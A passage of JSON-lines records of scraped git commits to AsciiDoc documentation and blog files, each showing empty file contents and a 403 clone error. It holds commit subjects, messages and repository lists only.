/elasticsearch,sreeramjayan\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,elasticdog\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,awislowski\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,wuranbo\/elasticsearch,awislowski\/elasticsearch,JackyMai\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,uschindler\/elasticsearch,palecur\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,ricardocerq\/elasticsearch,girirajsharma\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,mortonsykes\/elasticsearch,dpursehouse\/elasticsearch,gingerwizard\/elasticsearch,avikurapati\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,cwurm\/elasticsearch,ricardocerq\/elasticsearch,cwurm\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,girirajsharma\/elasticsearch,dpursehouse\/elasticsearch,JervyShi\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,palecur\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,pozhidaevak\/elasticsearch,zkidkid\/elasticsearch,GlenRSmith\/elasticsearch,ricardocerq\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,dongjoon-hyun\/elasticsearch,cwurm\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,jprante\/elasticsearch,rlugojr\/elasticsearch,LewayneNaidoo\/elasticsearch,zkidkid\/elasticsearch,spiegela\/elasticsearch,coding00
11\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/release-notes\/5.0.0-alpha4.asciidoc","new_file":"docs\/reference\/release-notes\/5.0.0-alpha4.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c9b55b756cba79a5a22284594b5a66edf58ca64","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad65e5388875462425aab128fe50d4de2812c572","subject":"Use \"$@\" instead of bare $@ to protect arguments","message":"Use \"$@\" instead of bare $@ to protect arguments\n\nBash expands bare $@, and then do word-splitting and file-globing. It breaks command-line arguments\r\nfor arduino if command-line arguments for the wrapper script contains $IFS, '*', '?' and etc. characters.\r\n\r\nUse \"$@\" in this case.","repos":"niggor\/Arduino_cc,NicoHood\/Arduino,stickbreaker\/Arduino,tbowmo\/Arduino,me-no-dev\/Arduino-1,stickbreaker\/Arduino,majenkotech\/Arduino,PaoloP74\/Arduino,NicoHood\/Arduino,me-no-dev\/Arduino-1,majenkotech\/Arduino,PaoloP74\/Arduino,majenkotech\/Arduino,majenkotech\/Arduino,Chris--A\/Arduino,me-no-dev\/Arduino-1,Chris--A\/Arduino,me-no-dev\/Arduino-1,nandojve\/Arduino,nandojve\/Arduino,stickbreaker\/Arduino,bsmr-arduino\/Arduino,me-no-dev\/Arduino-1,stickbreaker\/Arduino,Chris--A\/Arduino,NicoHood\/Arduino,PaoloP74\/Arduino,majenkotech\/Arduino,niggor\/Arduino_cc,bsmr-arduino\/Arduino,niggor\/Arduino_cc,me-no-dev\/Arduino-1,PaoloP74\/Arduino,bsmr-arduino\/Arduino,niggor\/Arduino_cc,PaoloP74\/Arduino,majenkotech\/Arduino,Chris--A\/Arduino,NicoHood\/Arduino,stickbreaker\/Arduino,bsmr-arduino\/Arduino,PaoloP74\/Arduino,stickbreaker\/Arduino,me-no-dev\/Arduino-1,bsmr-arduino\/Arduino,tbowmo\/Arduino,stickbreaker\/Arduino,NicoHood\/Arduino,tbowmo\/Arduino,nandojve\/Arduino,bsmr-arduino\/Arduino,niggor\/Arduino_cc,NicoHood\/Arduino,Chris--A\/Arduino,nandojve\/Arduino,bsmr-arduino\/Arduino,PaoloP74\/Arduino,Chris--A\/Arduino,nandojve\/Arduino,tbowmo\/Arduino,niggor\/Arduino_cc,bsmr-arduino\/Arduino,tbowmo\/Arduino,Chris--A\/Arduino,Chris--A\/Arduino,tbowmo\/Arduino,nandojve\/Arduino,niggor\/Arduino_cc,majenkotech\/Arduino,NicoHood\/Arduino,niggor\/Arduino_cc,nandojve\/Arduino,PaoloP74\/Arduino,niggor\/Arduino_cc,tbowmo\/Arduino,me-no-dev\/Arduino-1,nandojve\/Arduino,NicoHood\/Arduino,tbowmo\/Arduino","old_file":"build\/shared\/manpage.adoc","new_file":"build\/shared\/manpage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tbowmo\/Arduino.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} 
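The `"$@"` fix described in the Arduino commit message above is easy to demonstrate. Below is a minimal sketch, assuming only a POSIX `sh` on the PATH; the `printf` one-liners are hypothetical stand-ins for the wrapper script, chosen so that argument boundaries are visible in the output.

```python
import subprocess

# Hypothetical stand-ins for the wrapper script: each prints one "[...]"
# line per argument it receives, making any word splitting visible.
unquoted = 'printf "[%s]\n" $@'    # bare $@: fields are re-split (and glob-expanded)
quoted   = 'printf "[%s]\n" "$@"'  # "$@": each argument is passed through intact

arg = "two words"

# sh -c '<script>' <argv0> <positional args...>
subprocess.run(["sh", "-c", unquoted, "sh", arg])  # prints [two] then [words]
subprocess.run(["sh", "-c", quoted, "sh", arg])    # prints [two words]
```

With the unquoted form, an argument containing `$IFS` characters (or `*` and `?`, which would additionally undergo pathname expansion) arrives as several arguments; the quoted form preserves it as a single argument, which is exactly the behavior the commit message describes.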
{"commit":"d7d2929186351cd0b0ff76ef10ae82b4deeb15f3","subject":"Added smart pointer draft","message":"Added smart pointer draft","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8758c328847ea8ae7069f7c931478ed172d1ec5b","subject":"Create common-completesolution.adoc","message":"Create common-completesolution.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-completesolution.adoc","new_file":"src\/main\/docs\/common-completesolution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2290014395b07459fa87b53926922118386f5943","subject":"Update 2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","message":"Update 2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","repos":"manikmagar\/manikmagar.github.io,manikmagar\/manikmagar.github.io","old_file":"_posts\/2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","new_file":"_posts\/2016-11-24-Topcashback-USA-XMAS-treats-are-back-with-humming-bird.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manikmagar\/manikmagar.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ae6d8ec92f77e26f73b7b2e62d27c638cbac96","subject":"Update 2015-10-22-On-your-marks-get-set-Die.adoc","message":"Update 2015-10-22-On-your-marks-get-set-Die.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-22-On-your-marks-get-set-Die.adoc","new_file":"_posts\/2015-10-22-On-your-marks-get-set-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26a9dbcb7fb3c064e7a148fbdf70565829dc5fa1","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78797c7a74008cbbfa462165741391be70e7230c","subject":"Update CHANGELOG.adoc","message":"Update CHANGELOG.adoc\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"ee0a0cbb48500f1ed2749d0b1fdaa3e70e3f2a3b","subject":"Update 2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","message":"Update 2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io","old_file":"_posts\/2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","new_file":"_posts\/2015-09-07-Introduccion-al-Community-Manager-Rack-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4467afe55bd4411028c33e81c0fe3cebaa74ca2e","subject":"Update 2016-04-06-Buffer-Overflow-basic.adoc","message":"Update 2016-04-06-Buffer-Overflow-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Buffer-Overflow-basic.adoc","new_file":"_posts\/2016-04-06-Buffer-Overflow-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af850084d665bbd705bade1415b462180114a7d7","subject":"Update 2014-07-14-GitHub-Tools-und-Services.adoc","message":"Update 2014-07-14-GitHub-Tools-und-Services.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2014-07-14-GitHub-Tools-und-Services.adoc","new_file":"_posts\/2014-07-14-GitHub-Tools-und-Services.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d9b88ab38d3ca4f17c22282879851729b381038","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"568d39a2e5d82d60d07485fd858763c99d4cb19c","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7cceb236caefe4ba7a3f6137c124b09624622181","subject":"Update 2019-01-23-C-P-P.adoc","message":"Update 2019-01-23-C-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-23-C-P-P.adoc","new_file":"_posts\/2019-01-23-C-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526b3a5ae213c16ed38dd9207ab64135dfc075c1","subject":"Update 2019-01-31-Dica-Mouse-Without-Borders.adoc","message":"Update 2019-01-31-Dica-Mouse-Without-Borders.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2019-01-31-Dica-Mouse-Without-Borders.adoc","new_file":"_posts\/2019-01-31-Dica-Mouse-Without-Borders.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75b6e902bd119f7c4d02fb3cbba4f731b52f71e","subject":"Add Guide for OpenTelemetry","message":"Add Guide for OpenTelemetry\n\nResolves #16093\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/opentelemetry.adoc","new_file":"docs\/src\/main\/asciidoc\/opentelemetry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15727ae8ed6e9a5abf03009b15e1ec93c051fa50","subject":"[DOCS] Fixed formatting of Example headings. (#33038)","message":"[DOCS] Fixed formatting of Example headings. 
(#33038)\n\n","repos":"gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/painless\/painless-execute-script.asciidoc","new_file":"docs\/painless\/painless-execute-script.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a13f062f8ff70de904ee2d89c67be109db213047","subject":"Added XMLTokenizer language to Gitbook","message":"Added XMLTokenizer language to Gitbook\n","repos":"JYBESSON\/camel,onders86\/camel,Thopap\/camel,sverkera\/camel,tlehoux\/camel,yuruki\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,rmarting\/camel,bgaudaen\/camel,ullgren\/camel,gnodet\/camel,bhaveshdt\/camel,nikhilvibhav\/camel,jonmcewen\/camel,christophd\/camel,nboukhed\/camel,akhettar\/camel,christophd\/camel,hqstevenson\/camel,jonmcewen\/camel,isavin\/camel,mgyongyosi\/camel,allancth\/camel,pax95\/camel,neoramon\/camel,acartapanis\/camel,tlehoux\/camel,sverkera\/camel,lburgazzoli\/camel,isavin\/camel,gnodet\/camel,lburgazzoli\/apache-camel,NickCis\/camel,adessaigne\/camel,bhaveshdt\/camel,onders86\/camel,tdiesler\/camel,sverkera\/camel,apache\/camel,sirlatrom\/camel,anton-k11\/camel,sabre1041\/camel,JYBESSON\/camel,pax95\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,christophd\/camel,lburgazzoli\/camel,scranton\/camel,apache\/camel,bhaveshdt\/camel,kevinearls\/camel,tdiesler\/camel,punkhorn\/camel-upstream,gautric\/camel,lburgazzoli\/camel,pkletsko\/camel,nboukhed\/camel,Thopap\/camel,punkhorn\/camel-upstream,tkopczynski\/camel,kevinearls\/camel,tadayosi\/camel,driseley\/camel,bhaveshdt\/camel,prashant2402\/camel,anton-k11\/camel,gilfernandes\/camel,ssharma\/camel,sverkera\/camel,tlehoux\/camel,lburgazzoli\/apache-camel,gnodet\/camel,jamesnetherton\/camel,jamesnetherton\/camel,prashant2402\/camel,w4tson\/camel,allancth\/camel,rmarting\/camel,cunningt\/camel,tadayosi\/camel,anton-k11\/camel,CodeSmell\/camel,ullgren\/camel,prashant2402\/camel,lburgazzoli\/apache-camel,pkletsko\/camel,acartapanis\/camel,drsquidop\/camel,JYBESSON\/camel,curso007\/camel,curso007\/camel,alvinkwekel\/camel,anton-k11\/camel,JYBESSON\/camel,objectiser\/camel,anoordover\/camel,DariusX\/camel,yuruki\/camel,bgaudaen\/camel,gautric\/camel,chirino\/camel,w4tson\/camel,anoordover\/camel,jkorab\/camel,neoramon\/camel,rmarting\/c
amel,isavin\/camel,hqstevenson\/camel,drsquidop\/camel,tkopczynski\/camel,drsquidop\/camel,bgaudaen\/camel,veithen\/camel,kevinearls\/camel,rmarting\/camel,punkhorn\/camel-upstream,jkorab\/camel,chirino\/camel,CodeSmell\/camel,snurmine\/camel,tkopczynski\/camel,tadayosi\/camel,drsquidop\/camel,driseley\/camel,snurmine\/camel,snurmine\/camel,yuruki\/camel,RohanHart\/camel,jamesnetherton\/camel,mcollovati\/camel,kevinearls\/camel,CodeSmell\/camel,mgyongyosi\/camel,tdiesler\/camel,jarst\/camel,sirlatrom\/camel,gilfernandes\/camel,scranton\/camel,veithen\/camel,allancth\/camel,lburgazzoli\/camel,prashant2402\/camel,jamesnetherton\/camel,cunningt\/camel,adessaigne\/camel,anoordover\/camel,nikhilvibhav\/camel,bgaudaen\/camel,snurmine\/camel,onders86\/camel,gautric\/camel,cunningt\/camel,scranton\/camel,chirino\/camel,alvinkwekel\/camel,bhaveshdt\/camel,mcollovati\/camel,nboukhed\/camel,neoramon\/camel,hqstevenson\/camel,jamesnetherton\/camel,adessaigne\/camel,allancth\/camel,DariusX\/camel,christophd\/camel,RohanHart\/camel,pmoerenhout\/camel,neoramon\/camel,jonmcewen\/camel,yuruki\/camel,sirlatrom\/camel,curso007\/camel,Fabryprog\/camel,w4tson\/camel,objectiser\/camel,gnodet\/camel,sabre1041\/camel,sabre1041\/camel,lburgazzoli\/camel,ssharma\/camel,adessaigne\/camel,acartapanis\/camel,ssharma\/camel,isavin\/camel,snurmine\/camel,ullgren\/camel,gilfernandes\/camel,gnodet\/camel,dmvolod\/camel,snurmine\/camel,mgyongyosi\/camel,nboukhed\/camel,pmoerenhout\/camel,jarst\/camel,scranton\/camel,onders86\/camel,pkletsko\/camel,yuruki\/camel,sabre1041\/camel,anoordover\/camel,davidkarlsen\/camel,scranton\/camel,jonmcewen\/camel,zregvart\/camel,cunningt\/camel,mgyongyosi\/camel,chirino\/camel,allancth\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,jkorab\/camel,RohanHart\/camel,alvinkwekel\/camel,rmarting\/camel,mcollovati\/camel,drsquidop\/camel,onders86\/camel,dmvolod\/camel,ssharma\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,akhettar\/camel,scranton\/camel,jkorab\/camel,dmvolod\/camel,anton-k11\/camel,anoordover\/camel,RohanHart\/camel,cunningt\/camel,hqstevenson\/camel,veithen\/camel,Thopap\/camel,objectiser\/camel,JYBESSON\/camel,jkorab\/camel,davidkarlsen\/camel,curso007\/camel,driseley\/camel,nboukhed\/camel,mgyongyosi\/camel,NickCis\/camel,NickCis\/camel,JYBESSON\/camel,cunningt\/camel,adessaigne\/camel,sirlatrom\/camel,gautric\/camel,dmvolod\/camel,gautric\/camel,sabre1041\/camel,objectiser\/camel,pkletsko\/camel,zregvart\/camel,kevinearls\/camel,bhaveshdt\/camel,salikjan\/camel,akhettar\/camel,w4tson\/camel,NickCis\/camel,sirlatrom\/camel,pmoerenhout\/camel,ullgren\/camel,zregvart\/camel,jarst\/camel,jonmcewen\/camel,apache\/camel,dmvolod\/camel,tlehoux\/camel,CodeSmell\/camel,pmoerenhout\/camel,sverkera\/camel,curso007\/camel,pkletsko\/camel,pax95\/camel,gilfernandes\/camel,veithen\/camel,anton-k11\/camel,neoramon\/camel,tdiesler\/camel,gautric\/camel,sabre1041\/camel,NickCis\/camel,isavin\/camel,tkopczynski\/camel,tkopczynski\/camel,isavin\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,bgaudaen\/camel,nicolaferraro\/camel,tdiesler\/camel,ssharma\/camel,nicolaferraro\/camel,DariusX\/camel,tlehoux\/camel,gilfernandes\/camel,jarst\/camel,Thopap\/camel,bgaudaen\/camel,prashant2402\/camel,tkopczynski\/camel,rmarting\/camel,tadayosi\/camel,allancth\/camel,lburgazzoli\/camel,pax95\/camel,driseley\/camel,pmoerenhout\/camel,tlehoux\/camel,w4tson\/camel,christophd\/camel,sirlatrom\/camel,davidkarlsen\/camel,jarst\/camel,chirino\/camel,akhettar\/camel,veithen\/camel,jkorab\/camel,akhettar\/cam
el,nikhilvibhav\/camel,acartapanis\/camel,acartapanis\/camel,nboukhed\/camel,gilfernandes\/camel,mgyongyosi\/camel,Thopap\/camel,yuruki\/camel,zregvart\/camel,veithen\/camel,nicolaferraro\/camel,ssharma\/camel,acartapanis\/camel,Fabryprog\/camel,onders86\/camel,adessaigne\/camel,akhettar\/camel,NickCis\/camel,w4tson\/camel,kevinearls\/camel,chirino\/camel,curso007\/camel,driseley\/camel,sverkera\/camel,tadayosi\/camel,salikjan\/camel,neoramon\/camel,davidkarlsen\/camel,nicolaferraro\/camel,hqstevenson\/camel,anoordover\/camel,RohanHart\/camel,apache\/camel,drsquidop\/camel,driseley\/camel,DariusX\/camel,hqstevenson\/camel,pmoerenhout\/camel,RohanHart\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,jarst\/camel,jamesnetherton\/camel,pkletsko\/camel,Fabryprog\/camel,tdiesler\/camel,Thopap\/camel,lburgazzoli\/apache-camel,dmvolod\/camel,christophd\/camel","old_file":"camel-core\/src\/main\/docs\/xtokenize-language.adoc","new_file":"camel-core\/src\/main\/docs\/xtokenize-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"588abf6fa9d572ae907407e3fe0e7c62fb5d1e4f","subject":"Correct 'RAFT' to 'Raft'","message":"Correct 'RAFT' to 'Raft'\n\nChange-Id: Id084193ddb70f50d7d86abd2520cb7437c913e5d\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1958\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/introduction.adoc","new_file":"docs\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd9b712238d8b8540e9399f9d39de52c22510392","subject":"Update 2015-09-25-Testing-123.adoc","message":"Update 2015-09-25-Testing-123.adoc","repos":"tomas\/tomas.github.io,tomas\/tomas.github.io,tomas\/tomas.github.io","old_file":"_posts\/2015-09-25-Testing-123.adoc","new_file":"_posts\/2015-09-25-Testing-123.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomas\/tomas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54d7601349867b3d64e3b20bb27f1ce1647f6565","subject":"Update 2016-07-15-Git-command.adoc","message":"Update 
2016-07-15-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-15-Git-command.adoc","new_file":"_posts\/2016-07-15-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e220d39c8af5d40fb0f53900a406d14a17a9389a","subject":"Update 2016-06-10-Modulos-para-Angular-JS.adoc","message":"Update 2016-06-10-Modulos-para-Angular-JS.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2016-06-10-Modulos-para-Angular-JS.adoc","new_file":"_posts\/2016-06-10-Modulos-para-Angular-JS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 